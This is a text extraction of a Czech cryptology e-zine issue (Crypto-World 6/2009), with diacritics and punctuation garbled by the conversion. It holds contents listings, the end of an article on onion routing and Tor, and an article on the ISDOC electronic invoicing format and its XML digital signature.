(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 10: Sešit 6/2009 (452 kB)

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

Podpora formaacutetu v jednotlivyacutech ISERP V době psaniacute tohoto člaacutenku (červen 2009) ještě neniacute možneacute hodnotit uacuteroveň implementace v jednotlivyacutech IS protože většina vyacuterobců jiacute plaacutenuje až do podzimniacutech nebo zimniacutech legislativniacutech verziacute Nepochybně bude velmi zajiacutemaveacute porovnat jak jednotliviacute vyacuterobci k implementaci formaacutetu ISDOC ve svyacutech systeacutemech přistoupili Ať to ale provedou tak či onak důležiteacute je že fakturu nebude v systeacutemu přiacutejemce třeba znovu typovat a že položky budou automaticky (nebo alespoň poloautomaticky) rozeznaacuteny V tom se skryacutevaacute siacutela celeacuteho řešeniacute na straně přiacutejemce

